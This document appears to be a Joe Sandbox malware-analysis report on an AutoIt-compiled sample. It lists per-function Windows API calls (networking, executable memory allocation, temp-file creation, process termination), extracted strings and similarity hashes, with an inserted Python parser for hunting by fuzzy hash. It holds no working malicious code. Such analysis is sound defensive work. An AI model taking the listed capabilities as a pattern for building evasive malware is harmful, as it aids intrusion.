• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
• Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
• Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
• Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WS2_32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
• _free.LIBCMT ref: 004295A0
  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 3938964917-2609313903
                                                                                                                                                                                                                                                            • Opcode ID: d55ed5192cb25b7a7045e07b36078ae3fec908a18861f5dd6d928dc74c473dc7
                                                                                                                                                                                                                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d55ed5192cb25b7a7045e07b36078ae3fec908a18861f5dd6d928dc74c473dc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                            • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                                                                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                                                                                                                            • String ID: X$pWH
                                                                                                                                                                                                                                                            • API String ID: 85490731-941433119
                                                                                                                                                                                                                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
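The per-function records above (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are easier to query than to read once parsed. The following Python parser is an added example, not part of this report and not Joe Sandbox's own code: it turns that record layout into objects, keeping each API call's module and call-site address, marking the "Part of subcall function" lines as indirect, and storing the Similarity block (API ID, String ID, instruction fuzzy hash) as a dictionary, so one can for instance list every function whose own call sites reach WININET and collect their instruction fuzzy hashes for a similarity search across other reports. The sample input is constructed from three of the records above, trimmed to a single dump line each; the header names and the regular expressions are assumptions about this report layout.

```python
"""Parse Joe Sandbox IDA-plugin function records (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three records copied from the report text above and trimmed
# to one dump line each.  Layout (headers, bullets, indentation) is as on the page.
SAMPLE = r"""
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Similarity
• API ID: InternetOpen
• String ID: <local>
• Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545), ref: 0041013C
  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
Strings
Similarity
• API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
• String ID: X$pWH
• Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: XXXXXXXX"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Key: value" lines


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # address of the call site
    via_subcall: Optional[str] = None  # callee address when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, List[str]] = field(default_factory=dict)   # dump source / snapshot lines
    similarity: Dict[str, str] = field(default_factory=dict)

    @property
    def instruction_fuzzy_hash(self) -> Optional[str]:
        return self.similarity.get("Instruction Fuzzy Hash")

    def modules(self, include_subcalls: bool = True) -> set:
        return {c.module for c in self.apis if include_subcalls or c.via_subcall is None}


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; lines before the first header are dropped."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":              # every record starts with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:                 # a record cut off above the first header
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
        elif section == "Strings":
            current.strings.append(line.lstrip("• ").strip())
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                current.similarity[m["key"].strip()] = m["val"].strip()
        else:                               # Memory Dump Source / Joe Sandbox IDA Plugin
            m = KV_RE.match(line)
            if m:
                current.meta.setdefault(m["key"].strip(), []).append(m["val"].strip())
    return records


def functions_using(records, modules, include_subcalls: bool = False) -> List[FunctionRecord]:
    """Records whose own call sites (or, optionally, their listed callees) hit any of `modules`."""
    wanted = {m.upper() for m in modules}
    return [r for r in records if r.modules(include_subcalls) & wanted]


def hunt_hashes(records, modules) -> List[str]:
    """Instruction fuzzy hashes of matching functions, for similarity searches in other reports."""
    return sorted(r.instruction_fuzzy_hash for r in functions_using(records, modules)
                  if r.instruction_fuzzy_hash)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in functions_using(recs, ["WININET"]):
        print(r.similarity.get("API ID"), [c.name for c in r.apis], r.instruction_fuzzy_hash)
```

The parser keys records on the `APIs` header, so a record cut off at the top of a page (like the subcall lines that open this section) is skipped rather than attributed to the wrong function. `functions_using` looks only at a function's own call sites by default; pass `include_subcalls=True` to count the listed callees as reachable too, which is the right choice when judging capability rather than locating the exact call.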
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
• Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
• Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
• Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
APIs
• _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00401B57
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
Strings
Similarity
• API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
• String ID: @EXITCODE
• API String ID: 2734553683-3436989551
• Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
• Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
• Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
• Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
Strings
• C:\Users\user\Desktop\LKxcbzlwkz.exe, xrefs: 00410107
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
Similarity
• API ID: _strcat
• String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\LKxcbzlwkz.exe
• API String ID: 1765576173-1911961656
• Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
• Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
• Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
• Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
• Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
• Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
• Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                                                                                                                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                                                            APIs
Similarity
• API ID: __filbuf__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 1794320848-0
• Opcode ID: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
• Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
• Opcode Fuzzy Hash: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
• Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Similarity
• API ID: Process$CurrentTerminate
• String ID:
• API String ID: 2429186680-0
• Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
• Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
• Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
APIs
• _malloc.LIBCMT ref: 0043214B
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _malloc.LIBCMT ref: 0043215D
• _malloc.LIBCMT ref: 0043216F
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Opcode ID: 92974448857a051f90ee74f5c6efaf15b423c063d7dc04b13910ab597fafbedb
• Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
• Opcode Fuzzy Hash: 92974448857a051f90ee74f5c6efaf15b423c063d7dc04b13910ab597fafbedb
• Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
APIs
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• API String ID: 4217535847-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
• SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 00431E0D
• CloseHandle.KERNEL32(00000000), ref: 00431E14
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$CloseCreateHandleTime
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 0043210A
  • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
  • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
• _free.LIBCMT ref: 0043211D
• _free.LIBCMT ref: 00432130
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• VirtualAlloc.KERNEL32(00000000,00000060,00003000,00000040,00000000,?,?), ref: 0046F7EF
• _memmove.LIBCMT ref: 0046F7FE
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AllocVirtual_malloc_memmove
• API String ID: 4271362869-0
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
